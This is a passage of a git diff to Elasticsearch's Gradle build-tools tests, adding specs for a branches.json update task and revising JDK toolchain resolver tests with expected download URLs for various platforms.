Provider gradleBranchesLocationProvider = project.providers.provider { return branchesJsonPath.toString() } + providerFactorySpy.gradleProperty("org.elasticsearch.build.branches-file-location") >> gradleBranchesLocationProvider + project.getProviders() >> providerFactorySpy + branchesJsonPath.text = branchesJson( + [ + new DevelopmentBranch("main", Version.fromString("9.1.0")), + new DevelopmentBranch("9.0", Version.fromString("9.0.3")), + new DevelopmentBranch("8.19", Version.fromString("8.19.1")), + new DevelopmentBranch("8.18", Version.fromString("8.18.2")), + ] + ) + + when: + project.objects.newInstance(GlobalBuildInfoPlugin).apply(project) + BuildParameterExtension ext = project.extensions.getByType(BuildParameterExtension) + BwcVersions bwcVersions = ext.bwcVersions + + then: + bwcVersions != null + bwcVersions.unreleased.toSet() == ["9.1.0", "9.0.3", "8.19.1", "8.18.2"].collect { Version.fromString(it) }.toSet() + } + + String branchesJson(List branches) { + Map branchesFileContent = [ + branches: branches.collect { branch -> + [ + branch : branch.name(), + version: branch.version().toString(), + ] + } + ] + return JsonOutput.prettyPrint(JsonOutput.toJson(branchesFileContent)) + } +} diff --git a/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/release/UpdateBranchesJsonTaskSpec.groovy b/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/release/UpdateBranchesJsonTaskSpec.groovy new file mode 100644 index 0000000000000..705c3a8335dc1 --- /dev/null +++ b/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/release/UpdateBranchesJsonTaskSpec.groovy @@ -0,0 +1,267 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal.release + +import groovy.json.JsonOutput +import groovy.json.JsonSlurper +import spock.lang.Specification +import spock.lang.Subject + +import org.elasticsearch.gradle.Version +import org.elasticsearch.gradle.internal.info.DevelopmentBranch +import org.gradle.api.InvalidUserDataException +import org.gradle.api.Project +import org.gradle.testfixtures.ProjectBuilder +import spock.lang.TempDir + +class UpdateBranchesJsonTaskSpec extends Specification { + + @Subject + UpdateBranchesJsonTask task + + @TempDir + File projectRoot + JsonSlurper jsonSlurper = new JsonSlurper() + + def setup() { + Project project = ProjectBuilder.builder().withProjectDir(projectRoot).build() + task = project.tasks.register("updateBranchesJson", UpdateBranchesJsonTask).get() + task.branchesFile = new File(projectRoot, "branches.json") + } + + def "add new branch to branches.json (sorted by version) when --add-branch is specified"() { + given: + branchesJson([ + new DevelopmentBranch("main", Version.fromString("9.1.0")), + new DevelopmentBranch("8.18", Version.fromString("8.18.2")), + new DevelopmentBranch("8.17", Version.fromString("8.17.7")), + ]) + task.addBranch('8.19:8.19.0') + + when: + task.executeTask() + + then: + def branchesFile = new File(projectRoot, "branches.json") + def json = jsonSlurper.parse(branchesFile) + json.branches == [ + [branch: 'main', version: '9.1.0'], + [branch: '8.19', version: '8.19.0'], + [branch: '8.18', version: '8.18.2'], + [branch: '8.17', version: '8.17.7'], + ] + } + + def "remove branch from branches.json when --remove-branch is specified"() { + given: + branchesJson([ + new DevelopmentBranch("main", Version.fromString("9.1.0")), + new DevelopmentBranch("8.18", Version.fromString("8.18.2")), + new DevelopmentBranch("8.17", Version.fromString("8.17.7")), + ]) + task.removeBranch('8.18') + + when: + task.executeTask() + + then: + def branchesFile = new File(projectRoot, "branches.json") + def json = jsonSlurper.parse(branchesFile) + json.branches == [ + [branch: 'main', version: '9.1.0'], + [branch: '8.17', version: '8.17.7'], + ] + } + + def "update branch version when --update-branch is specified"() { + given: + branchesJson([ + new DevelopmentBranch("main", Version.fromString("9.1.0")), + new DevelopmentBranch("8.18", Version.fromString("8.18.2")), + new DevelopmentBranch("8.17", Version.fromString("8.17.7")), + ]) + task.updateBranch('8.18:8.18.3') + + when: + task.executeTask() + + then: + def branchesFile = new File(projectRoot, "branches.json") + def json = jsonSlurper.parse(branchesFile) + json.branches == [ + [branch: 'main', version: '9.1.0'], + [branch: '8.18', version: '8.18.3'], + [branch: '8.17', version: '8.17.7'], + ] + } + + def "change branches.json when multiple options are specified"() { + given: + branchesJson([ + new DevelopmentBranch("main", Version.fromString("9.1.0")), + new DevelopmentBranch("8.18", Version.fromString("8.18.2")), + new DevelopmentBranch("8.17", Version.fromString("8.17.7")), + ]) + task.addBranch('8.19:8.19.0') + task.removeBranch('8.18') + task.updateBranch('8.17:8.17.8') + + when: + task.executeTask() + + then: + def branchesFile = new File(projectRoot, "branches.json") + def json = jsonSlurper.parse(branchesFile) + json.branches == [ + [branch: 'main', version: '9.1.0'], + [branch: '8.19', version: '8.19.0'], + [branch: '8.17', version: '8.17.8'], + ] + } + + def "fail when no --add-branch, --remove-branch or --update-branch is specified"() { + given: + branchesJson([ + new DevelopmentBranch("main", Version.fromString("9.1.0")), + new DevelopmentBranch("8.18", Version.fromString("8.18.2")), + new DevelopmentBranch("8.17", Version.fromString("8.17.7")), + ]) + + when: + task.executeTask() + + then: + def branchesFile = new File(projectRoot, "branches.json") + def json = jsonSlurper.parse(branchesFile) + json.branches == [ + [branch: 'main', version: '9.1.0'], + [branch: '8.18', version: '8.18.2'], + [branch: '8.17', version: '8.17.7'], + ] + thrown(InvalidUserDataException) + } + + def "fail when adding a branch that already exists"() { + given: + branchesJson([ + new DevelopmentBranch("main", Version.fromString("9.1.0")), + new DevelopmentBranch("8.18", Version.fromString("8.18.2")), + new DevelopmentBranch("8.17", Version.fromString("8.17.7")), + ]) + task.addBranch('8.18:8.18.3') + + when: + task.executeTask() + + then: + def branchesFile = new File(projectRoot, "branches.json") + def json = jsonSlurper.parse(branchesFile) + json.branches == [ + [branch: 'main', version: '9.1.0'], + [branch: '8.18', version: '8.18.2'], + [branch: '8.17', version: '8.17.7'], + ] + thrown(InvalidUserDataException) + } + + def "fail when removing a branch that does not exist"() { + given: + branchesJson([ + new DevelopmentBranch("main", Version.fromString("9.1.0")), + new DevelopmentBranch("8.18", Version.fromString("8.18.2")), + new DevelopmentBranch("8.17", Version.fromString("8.17.7")), + ]) + task.removeBranch('8.19') + + when: + task.executeTask() + + then: + def branchesFile = new File(projectRoot, "branches.json") + def json = jsonSlurper.parse(branchesFile) + json.branches == [ + [branch: 'main', version: '9.1.0'], + [branch: '8.18', version: '8.18.2'], + [branch: '8.17', version: '8.17.7'], + ] + thrown(InvalidUserDataException) + } + + def "fail when updating a branch that does not exist"() { + given: + branchesJson([ + new DevelopmentBranch("main", Version.fromString("9.1.0")), + new DevelopmentBranch("8.18", Version.fromString("8.18.2")), + new DevelopmentBranch("8.17", Version.fromString("8.17.7")), + ]) + task.updateBranch('8.19:8.19.0') + + when: + task.executeTask() + + then: + def branchesFile = new File(projectRoot, "branches.json") + def json = jsonSlurper.parse(branchesFile) + json.branches == [ + [branch: 'main', version: '9.1.0'], + [branch: '8.18', version: '8.18.2'], + [branch: '8.17', version: '8.17.7'], + ] + thrown(InvalidUserDataException) + } + + def "fail when adding a branch with an invalid version"() { + given: + branchesJson([ + new DevelopmentBranch("main", Version.fromString("9.1.0")), + new DevelopmentBranch("8.18", Version.fromString("8.18.2")), + new DevelopmentBranch("8.17", Version.fromString("8.17.7")), + ]) + + when: + task.addBranch('8.19:invalid') + task.executeTask() + + then: + def branchesFile = new File(projectRoot, "branches.json") + def json = jsonSlurper.parse(branchesFile) + json.branches == [ + [branch: 'main', version: '9.1.0'], + [branch: '8.18', version: '8.18.2'], + [branch: '8.17', version: '8.17.7'], + ] + thrown(IllegalArgumentException) + } + + def "fail when branches.json is missing"() { + given: + task.updateBranch('8.19:8.19.0') + + when: + task.executeTask() + + then: + def exception = thrown(InvalidUserDataException) + exception.message.contains("branches.json has not been found") + } + + void branchesJson(List branches) { + File branchesFile = new File(projectRoot, "branches.json") + Map branchesFileContent = [ + branches: branches.collect { branch -> + [ + branch: branch.name(), + version: branch.version().toString(), + ] + } + ] + branchesFile.text = JsonOutput.prettyPrint(JsonOutput.toJson(branchesFileContent)) + } +} diff --git a/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/toolchain/AbstractToolchainResolverSpec.groovy b/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/toolchain/AbstractToolchainResolverSpec.groovy index cea96437129a6..05372f25a4981 100644 --- a/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/toolchain/AbstractToolchainResolverSpec.groovy +++ b/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/toolchain/AbstractToolchainResolverSpec.groovy @@ -73,6 +73,7 @@ abstract class AbstractToolchainResolverSpec extends Specification { _ * languageVersionProperty.get() >> languageVersion Property vendorSpecProperty = Mock() + _ * vendorSpecProperty.isPresent() >> true _ * vendorSpecProperty.get() >> vendorSpec _ * toolchainSpec.getVendor() >> vendorSpecProperty diff --git a/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/toolchain/AdoptiumJdkToolchainResolverSpec.groovy b/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/toolchain/AdoptiumJdkToolchainResolverSpec.groovy index 5abb78b062c39..f26c9c46d52b3 100644 --- a/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/toolchain/AdoptiumJdkToolchainResolverSpec.groovy +++ b/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/toolchain/AdoptiumJdkToolchainResolverSpec.groovy @@ -47,7 +47,7 @@ class AdoptiumJdkToolchainResolverSpec extends AbstractToolchainResolverSpec { @Override def supportedRequests() { return [ - [19, ADOPTIUM, MAC_OS, X86_64, "https://api.adoptium.net/v3/binary/version/jdk-19.1.1.1+37.1/mac/x64/jdk/hotspot/normal/eclipse?project=jdk"], + [19, ADOPTIUM, LINUX, X86_64, "https://api.adoptium.net/v3/binary/version/jdk-19.1.1.1+37.1/linux/x64/jdk/hotspot/normal/eclipse?project=jdk"], [19, ADOPTIUM, WINDOWS, X86_64, "https://api.adoptium.net/v3/binary/version/jdk-19.1.1.1+37.1/windows/x64/jdk/hotspot/normal/eclipse?project=jdk"], [19, ADOPTIUM, MAC_OS, AARCH64, "https://api.adoptium.net/v3/binary/version/jdk-19.1.1.1+37.1/mac/aarch64/jdk/hotspot/normal/eclipse?project=jdk"], diff --git a/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/toolchain/EarlyAccessCatalogJdkToolchainResolverSpec.groovy b/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/toolchain/EarlyAccessCatalogJdkToolchainResolverSpec.groovy new file mode 100644 index 0000000000000..e13e52e23a35b --- /dev/null +++ b/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/toolchain/EarlyAccessCatalogJdkToolchainResolverSpec.groovy @@ -0,0 +1,94 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal.toolchain + +import org.elasticsearch.gradle.VersionProperties +import org.gradle.api.services.BuildServiceParameters +import org.gradle.jvm.toolchain.JavaLanguageVersion +import org.gradle.jvm.toolchain.JavaToolchainDownload +import org.gradle.jvm.toolchain.JavaToolchainResolver + +import static org.gradle.platform.Architecture.AARCH64 +import static org.gradle.platform.Architecture.X86_64 +import static org.gradle.platform.OperatingSystem.* + +class EarlyAccessCatalogJdkToolchainResolverSpec extends AbstractToolchainResolverSpec { + @Override + JavaToolchainResolver resolverImplementation() { + def resolver = new EarlyAccessCatalogJdkToolchainResolver() { + @Override + BuildServiceParameters.None getParameters() { + return null + } + } + resolver.earlyAccessJdkBuildResolver = (JavaLanguageVersion version) -> { + new EarlyAccessCatalogJdkToolchainResolver.PreReleaseJdkBuild(version, 30, 'ea') + } + return resolver + } + + def "resolves rc versions #os #arch #vendor jdk #langVersion"() { + given: + def resolver = new EarlyAccessCatalogJdkToolchainResolver() { + @Override + BuildServiceParameters.None getParameters() { + return null + } + } + resolver.earlyAccessJdkBuildResolver = (JavaLanguageVersion version) -> { + new EarlyAccessCatalogJdkToolchainResolver.PreReleaseJdkBuild(version, 30, 'rc') + } + when: + Optional download = resolver.resolve(request(JavaLanguageVersion.of(langVersion), vendor, platform(os, arch))) + + then: + download.get().uri == URI.create(expectedUrl) + where: + + [langVersion, vendor, os, arch, expectedUrl] << [ + [25, anyVendor(), LINUX, X86_64, "https://builds.es-jdk-archive.com/jdks/openjdk/25/openjdk-25-rc+30/openjdk-25_linux-x64_bin.tar.gz"], + [25, anyVendor(), LINUX, AARCH64, "https://builds.es-jdk-archive.com/jdks/openjdk/25/openjdk-25-rc+30/openjdk-25_linux-aarch64_bin.tar.gz"], + [25, anyVendor(), MAC_OS, X86_64, "https://builds.es-jdk-archive.com/jdks/openjdk/25/openjdk-25-rc+30/openjdk-25_macos-x64_bin.tar.gz"], + [25, anyVendor(), MAC_OS, AARCH64, "https://builds.es-jdk-archive.com/jdks/openjdk/25/openjdk-25-rc+30/openjdk-25_macos-aarch64_bin.tar.gz"], + [25, anyVendor(), WINDOWS, X86_64, "https://builds.es-jdk-archive.com/jdks/openjdk/25/openjdk-25-rc+30/openjdk-25_windows-x64_bin.zip"], + + [26, anyVendor(), LINUX, X86_64, "https://builds.es-jdk-archive.com/jdks/openjdk/26/openjdk-26-rc+30/openjdk-26_linux-x64_bin.tar.gz"], + [26, anyVendor(), LINUX, AARCH64, "https://builds.es-jdk-archive.com/jdks/openjdk/26/openjdk-26-rc+30/openjdk-26_linux-aarch64_bin.tar.gz"], + [26, anyVendor(), MAC_OS, X86_64, "https://builds.es-jdk-archive.com/jdks/openjdk/26/openjdk-26-rc+30/openjdk-26_macos-x64_bin.tar.gz"], + [26, anyVendor(), MAC_OS, AARCH64, "https://builds.es-jdk-archive.com/jdks/openjdk/26/openjdk-26-rc+30/openjdk-26_macos-aarch64_bin.tar.gz"], + [26, anyVendor(), WINDOWS, X86_64, "https://builds.es-jdk-archive.com/jdks/openjdk/26/openjdk-26-rc+30/openjdk-26_windows-x64_bin.zip"] + ] + } + + + @Override + def supportedRequests() { + return [ + [25, anyVendor(), LINUX, X86_64, "https://builds.es-jdk-archive.com/jdks/openjdk/25/openjdk-25-ea+30/openjdk-25-ea+30_linux-x64_bin.tar.gz"], + [25, anyVendor(), LINUX, AARCH64, "https://builds.es-jdk-archive.com/jdks/openjdk/25/openjdk-25-ea+30/openjdk-25-ea+30_linux-aarch64_bin.tar.gz"], + [25, anyVendor(), MAC_OS, X86_64, "https://builds.es-jdk-archive.com/jdks/openjdk/25/openjdk-25-ea+30/openjdk-25-ea+30_macos-x64_bin.tar.gz"], + [25, anyVendor(), MAC_OS, AARCH64, "https://builds.es-jdk-archive.com/jdks/openjdk/25/openjdk-25-ea+30/openjdk-25-ea+30_macos-aarch64_bin.tar.gz"], + [25, anyVendor(), WINDOWS, X86_64, "https://builds.es-jdk-archive.com/jdks/openjdk/25/openjdk-25-ea+30/openjdk-25-ea+30_windows-x64_bin.zip"], + + [26, anyVendor(), LINUX, X86_64, "https://builds.es-jdk-archive.com/jdks/openjdk/26/openjdk-26-ea+30/openjdk-26-ea+30_linux-x64_bin.tar.gz"], + [26, anyVendor(), LINUX, AARCH64, "https://builds.es-jdk-archive.com/jdks/openjdk/26/openjdk-26-ea+30/openjdk-26-ea+30_linux-aarch64_bin.tar.gz"], + [26, anyVendor(), MAC_OS, X86_64, "https://builds.es-jdk-archive.com/jdks/openjdk/26/openjdk-26-ea+30/openjdk-26-ea+30_macos-x64_bin.tar.gz"], + [26, anyVendor(), MAC_OS, AARCH64, "https://builds.es-jdk-archive.com/jdks/openjdk/26/openjdk-26-ea+30/openjdk-26-ea+30_macos-aarch64_bin.tar.gz"], + [26, anyVendor(), WINDOWS, X86_64, "https://builds.es-jdk-archive.com/jdks/openjdk/26/openjdk-26-ea+30/openjdk-26-ea+30_windows-x64_bin.zip"] + ] + } + + @Override + def unsupportedRequests() { + [ + [Integer.parseInt(VersionProperties.bundledJdkMajorVersion) + 1, anyVendor(), WINDOWS, AARCH64], + ] + } +} diff --git a/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/toolchain/OracleOpenJdkToolchainResolverSpec.groovy b/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/toolchain/OracleOpenJdkToolchainResolverSpec.groovy index 9de9cea65a393..3ea53043687b5 100644 --- a/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/toolchain/OracleOpenJdkToolchainResolverSpec.groovy +++ b/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/toolchain/OracleOpenJdkToolchainResolverSpec.groovy @@ -9,11 +9,9 @@ package org.elasticsearch.gradle.internal.toolchain -import spock.util.environment.RestoreSystemProperties import org.gradle.api.services.BuildServiceParameters import org.gradle.jvm.toolchain.JavaLanguageVersion -import org.gradle.jvm.toolchain.JavaToolchainDownload import static org.gradle.jvm.toolchain.JvmVendorSpec.ORACLE import static org.gradle.platform.Architecture.AARCH64 @@ -22,7 +20,6 @@ import static org.gradle.platform.OperatingSystem.* class OracleOpenJdkToolchainResolverSpec extends AbstractToolchainResolverSpec { - OracleOpenJdkToolchainResolver resolverImplementation() { var toolChain = new OracleOpenJdkToolchainResolver() { @Override @@ -38,8 +35,7 @@ class OracleOpenJdkToolchainResolverSpec extends AbstractToolchainResolverSpec { "36", "bdc68b4b9cbc4ebcb30745c85038d91d" ), - OracleOpenJdkToolchainResolver.getBundledJdkBuild("24+36@1f9ff9062db4449d8ca828c504ffae90", "24"), - OracleOpenJdkToolchainResolver.getEarlyAccessBuild(JavaLanguageVersion.of(25), "3") + OracleOpenJdkToolchainResolver.getBundledJdkBuild("24.0.2+12@fdc5d0102fe0414db21410ad5834341f", "24"), ] toolChain } @@ -56,64 +52,21 @@ class OracleOpenJdkToolchainResolverSpec extends AbstractToolchainResolverSpec { [20, anyVendor(), LINUX, AARCH64, "https://download.oracle.com/java/GA/jdk20/bdc68b4b9cbc4ebcb30745c85038d91d/36/GPL/openjdk-20_linux-aarch64_bin.tar.gz"], [20, anyVendor(), WINDOWS, X86_64, "https://download.oracle.com/java/GA/jdk20/bdc68b4b9cbc4ebcb30745c85038d91d/36/GPL/openjdk-20_windows-x64_bin.zip"], // bundled jdk - [24, ORACLE, MAC_OS, X86_64, "https://download.oracle.com/java/GA/jdk24/1f9ff9062db4449d8ca828c504ffae90/36/GPL/openjdk-24_macos-x64_bin.tar.gz"], - [24, ORACLE, MAC_OS, AARCH64, "https://download.oracle.com/java/GA/jdk24/1f9ff9062db4449d8ca828c504ffae90/36/GPL/openjdk-24_macos-aarch64_bin.tar.gz"], - [24, ORACLE, LINUX, X86_64, "https://download.oracle.com/java/GA/jdk24/1f9ff9062db4449d8ca828c504ffae90/36/GPL/openjdk-24_linux-x64_bin.tar.gz"], - [24, ORACLE, LINUX, AARCH64, "https://download.oracle.com/java/GA/jdk24/1f9ff9062db4449d8ca828c504ffae90/36/GPL/openjdk-24_linux-aarch64_bin.tar.gz"], - [24, ORACLE, WINDOWS, X86_64, "https://download.oracle.com/java/GA/jdk24/1f9ff9062db4449d8ca828c504ffae90/36/GPL/openjdk-24_windows-x64_bin.zip"], - [24, anyVendor(), MAC_OS, X86_64, "https://download.oracle.com/java/GA/jdk24/1f9ff9062db4449d8ca828c504ffae90/36/GPL/openjdk-24_macos-x64_bin.tar.gz"], - [24, anyVendor(), MAC_OS, AARCH64, "https://download.oracle.com/java/GA/jdk24/1f9ff9062db4449d8ca828c504ffae90/36/GPL/openjdk-24_macos-aarch64_bin.tar.gz"], - [24, anyVendor(), LINUX, X86_64, "https://download.oracle.com/java/GA/jdk24/1f9ff9062db4449d8ca828c504ffae90/36/GPL/openjdk-24_linux-x64_bin.tar.gz"], - [24, anyVendor(), LINUX, AARCH64, "https://download.oracle.com/java/GA/jdk24/1f9ff9062db4449d8ca828c504ffae90/36/GPL/openjdk-24_linux-aarch64_bin.tar.gz"], - [24, anyVendor(), WINDOWS, X86_64, "https://download.oracle.com/java/GA/jdk24/1f9ff9062db4449d8ca828c504ffae90/36/GPL/openjdk-24_windows-x64_bin.zip"], - // EA build - [25, ORACLE, MAC_OS, X86_64, "https://download.java.net/java/early_access/jdk25/3/GPL/openjdk-25-ea+3_macos-x64_bin.tar.gz"], - [25, ORACLE, MAC_OS, AARCH64, "https://download.java.net/java/early_access/jdk25/3/GPL/openjdk-25-ea+3_macos-aarch64_bin.tar.gz"], - [25, ORACLE, LINUX, X86_64, "https://download.java.net/java/early_access/jdk25/3/GPL/openjdk-25-ea+3_linux-x64_bin.tar.gz"], - [25, ORACLE, LINUX, AARCH64, "https://download.java.net/java/early_access/jdk25/3/GPL/openjdk-25-ea+3_linux-aarch64_bin.tar.gz"], - [25, ORACLE, WINDOWS, X86_64, "https://download.java.net/java/early_access/jdk25/3/GPL/openjdk-25-ea+3_windows-x64_bin.zip"], - [25, anyVendor(), MAC_OS, X86_64, "https://download.java.net/java/early_access/jdk25/3/GPL/openjdk-25-ea+3_macos-x64_bin.tar.gz"], - [25, anyVendor(), MAC_OS, AARCH64, "https://download.java.net/java/early_access/jdk25/3/GPL/openjdk-25-ea+3_macos-aarch64_bin.tar.gz"], - [25, anyVendor(), LINUX, X86_64, "https://download.java.net/java/early_access/jdk25/3/GPL/openjdk-25-ea+3_linux-x64_bin.tar.gz"], - [25, anyVendor(), LINUX, AARCH64, "https://download.java.net/java/early_access/jdk25/3/GPL/openjdk-25-ea+3_linux-aarch64_bin.tar.gz"], - [25, anyVendor(), WINDOWS, X86_64, "https://download.java.net/java/early_access/jdk25/3/GPL/openjdk-25-ea+3_windows-x64_bin.zip"]] - } - - @RestoreSystemProperties - def "can provide build number for ea versions"() { - given: - System.setProperty('runtime.java.build', "42") - System.setProperty('runtime.java.25.build', "13") - def resolver = resolverImplementation() - - when: - Optional download = resolver.resolve( - request( - JavaLanguageVersion.of(version), - vendor, - platform(os, arch) - ) - ) - - then: - download.get().uri == URI.create(expectedUrl) - - where: - version | vendor | os | arch | expectedUrl - 25 | ORACLE | MAC_OS | X86_64 | urlPrefix(25) + "13/GPL/openjdk-25-ea+13_macos-x64_bin.tar.gz" - 25 | ORACLE | MAC_OS | AARCH64 | urlPrefix(25) + "13/GPL/openjdk-25-ea+13_macos-aarch64_bin.tar.gz" - 25 | ORACLE | LINUX | X86_64 | urlPrefix(25) + "13/GPL/openjdk-25-ea+13_linux-x64_bin.tar.gz" - 25 | ORACLE | LINUX | AARCH64 | urlPrefix(25) + "13/GPL/openjdk-25-ea+13_linux-aarch64_bin.tar.gz" - 25 | ORACLE | WINDOWS | X86_64 | urlPrefix(25) + "13/GPL/openjdk-25-ea+13_windows-x64_bin.zip" - 25 | anyVendor() | MAC_OS | X86_64 | urlPrefix(25) + "13/GPL/openjdk-25-ea+13_macos-x64_bin.tar.gz" - 25 | anyVendor() | MAC_OS | AARCH64 | urlPrefix(25) + "13/GPL/openjdk-25-ea+13_macos-aarch64_bin.tar.gz" - 25 | anyVendor() | LINUX | X86_64 | urlPrefix(25) + "13/GPL/openjdk-25-ea+13_linux-x64_bin.tar.gz" - 25 | anyVendor() | LINUX | AARCH64 | urlPrefix(25) + "13/GPL/openjdk-25-ea+13_linux-aarch64_bin.tar.gz" - 25 | anyVendor() | WINDOWS | X86_64 | urlPrefix(25) + "13/GPL/openjdk-25-ea+13_windows-x64_bin.zip" + [24, ORACLE, MAC_OS, X86_64, "https://download.oracle.com/java/GA/jdk24.0.2/fdc5d0102fe0414db21410ad5834341f/12/GPL/openjdk-24.0.2_macos-x64_bin.tar.gz"], + [24, ORACLE, MAC_OS, AARCH64, "https://download.oracle.com/java/GA/jdk24.0.2/fdc5d0102fe0414db21410ad5834341f/12/GPL/openjdk-24.0.2_macos-aarch64_bin.tar.gz"], + [24, ORACLE, LINUX, X86_64, "https://download.oracle.com/java/GA/jdk24.0.2/fdc5d0102fe0414db21410ad5834341f/12/GPL/openjdk-24.0.2_linux-x64_bin.tar.gz"], + [24, ORACLE, LINUX, AARCH64, "https://download.oracle.com/java/GA/jdk24.0.2/fdc5d0102fe0414db21410ad5834341f/12/GPL/openjdk-24.0.2_linux-aarch64_bin.tar.gz"], + [24, ORACLE, WINDOWS, X86_64, "https://download.oracle.com/java/GA/jdk24.0.2/fdc5d0102fe0414db21410ad5834341f/12/GPL/openjdk-24.0.2_windows-x64_bin.zip"], + [24, anyVendor(), MAC_OS, X86_64, "https://download.oracle.com/java/GA/jdk24.0.2/fdc5d0102fe0414db21410ad5834341f/12/GPL/openjdk-24.0.2_macos-x64_bin.tar.gz"], + [24, anyVendor(), MAC_OS, AARCH64, "https://download.oracle.com/java/GA/jdk24.0.2/fdc5d0102fe0414db21410ad5834341f/12/GPL/openjdk-24.0.2_macos-aarch64_bin.tar.gz"], + [24, anyVendor(), LINUX, X86_64, "https://download.oracle.com/java/GA/jdk24.0.2/fdc5d0102fe0414db21410ad5834341f/12/GPL/openjdk-24.0.2_linux-x64_bin.tar.gz"], + [24, anyVendor(), LINUX, AARCH64, "https://download.oracle.com/java/GA/jdk24.0.2/fdc5d0102fe0414db21410ad5834341f/12/GPL/openjdk-24.0.2_linux-aarch64_bin.tar.gz"], + [24, anyVendor(), WINDOWS, X86_64, "https://download.oracle.com/java/GA/jdk24.0.2/fdc5d0102fe0414db21410ad5834341f/12/GPL/openjdk-24.0.2_windows-x64_bin.zip"] + ] } private static String urlPrefix(int i) { - return "https://download.java.net/java/early_access/jdk" + i + "/" + return "https://builds.es-jdk-archive.com/jdks/openjdk/" + i + "/" } def unsupportedRequests() { diff --git a/build-tools-internal/src/test/java/org/elasticsearch/gradle/AbstractDistributionDownloadPluginTests.java b/build-tools-internal/src/test/java/org/elasticsearch/gradle/AbstractDistributionDownloadPluginTests.java index 7512fa20814c6..d2c9bb2c88b5e 100644 --- a/build-tools-internal/src/test/java/org/elasticsearch/gradle/AbstractDistributionDownloadPluginTests.java +++ b/build-tools-internal/src/test/java/org/elasticsearch/gradle/AbstractDistributionDownloadPluginTests.java @@ -10,6 +10,7 @@ package org.elasticsearch.gradle; import org.elasticsearch.gradle.internal.BwcVersions; +import org.elasticsearch.gradle.internal.info.DevelopmentBranch; import org.gradle.api.NamedDomainObjectContainer; import org.gradle.api.Project; import org.gradle.testfixtures.ProjectBuilder; @@ -29,7 +30,12 @@ public class AbstractDistributionDownloadPluginTests { protected static final Version BWC_STAGED_VERSION = Version.fromString("1.0.0"); protected static final Version BWC_BUGFIX_VERSION = Version.fromString("1.0.1"); protected static final Version BWC_MAINTENANCE_VERSION = Version.fromString("0.90.1"); - protected static final List DEVELOPMENT_BRANCHES = Arrays.asList("main", "1.1", "1.0", "0.90"); + protected static final List DEVELOPMENT_BRANCHES = Arrays.asList( + new DevelopmentBranch("main", Version.fromString("2.0.0")), + new DevelopmentBranch("1.1", Version.fromString("1.1.0")), + new DevelopmentBranch("1.0", Version.fromString("1.0.1")), + new DevelopmentBranch("0.90", Version.fromString("0.90.1")) + ); protected static final BwcVersions BWC_MINOR = new BwcVersions( BWC_MAJOR_VERSION, diff --git a/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/release/ReleaseNotesGeneratorTest.java b/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/release/ReleaseNotesGeneratorTest.java index feb1ac1687116..380d4fbf8414d 100644 --- a/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/release/ReleaseNotesGeneratorTest.java +++ b/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/release/ReleaseNotesGeneratorTest.java @@ -19,6 +19,7 @@ import java.util.Objects; import static org.elasticsearch.gradle.internal.release.GenerateReleaseNotesTask.getSortedBundlesWithUniqueChangelogs; +import static org.hamcrest.Matchers.arrayContaining; import static org.hamcrest.Matchers.equalTo; import static org.junit.Assert.assertFalse; import static org.junit.Assert.assertThat; @@ -100,7 +101,10 @@ public void testTemplate(String templateFilename, String outputFilename, List expectedTransformation = getTests(test_transformed); - NumericNode replacementNode = MAPPER.convertValue(99.99, NumericNode.class); + var replacementNode = SerializableJsonNode.of(99.99, NumericNode.class); List transformedTests = transformTests( tests, diff --git a/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/test/rest/transform/length/ReplaceValueInLengthTests.java b/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/test/rest/transform/length/ReplaceValueInLengthTests.java index 17d7bb1c65f3e..e033c9f2a1640 100644 --- a/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/test/rest/transform/length/ReplaceValueInLengthTests.java +++ b/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/test/rest/transform/length/ReplaceValueInLengthTests.java @@ -15,6 +15,7 @@ import com.fasterxml.jackson.dataformat.yaml.YAMLFactory; import org.elasticsearch.gradle.internal.test.rest.transform.AssertObjectNodes; +import org.elasticsearch.gradle.internal.test.rest.transform.SerializableJsonNode; import org.elasticsearch.gradle.internal.test.rest.transform.TransformTests; import org.junit.Test; @@ -34,7 +35,7 @@ public void testReplaceMatch() throws Exception { String test_transformed = "/rest/transform/length/length_replace_transformed_value.yml"; List expectedTransformation = getTests(test_transformed); - NumericNode replacementNode = MAPPER.convertValue(99, NumericNode.class); + var replacementNode = SerializableJsonNode.of(99, NumericNode.class); List transformedTests = transformTests( tests, diff --git a/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/test/rest/transform/match/AddMatchTests.java 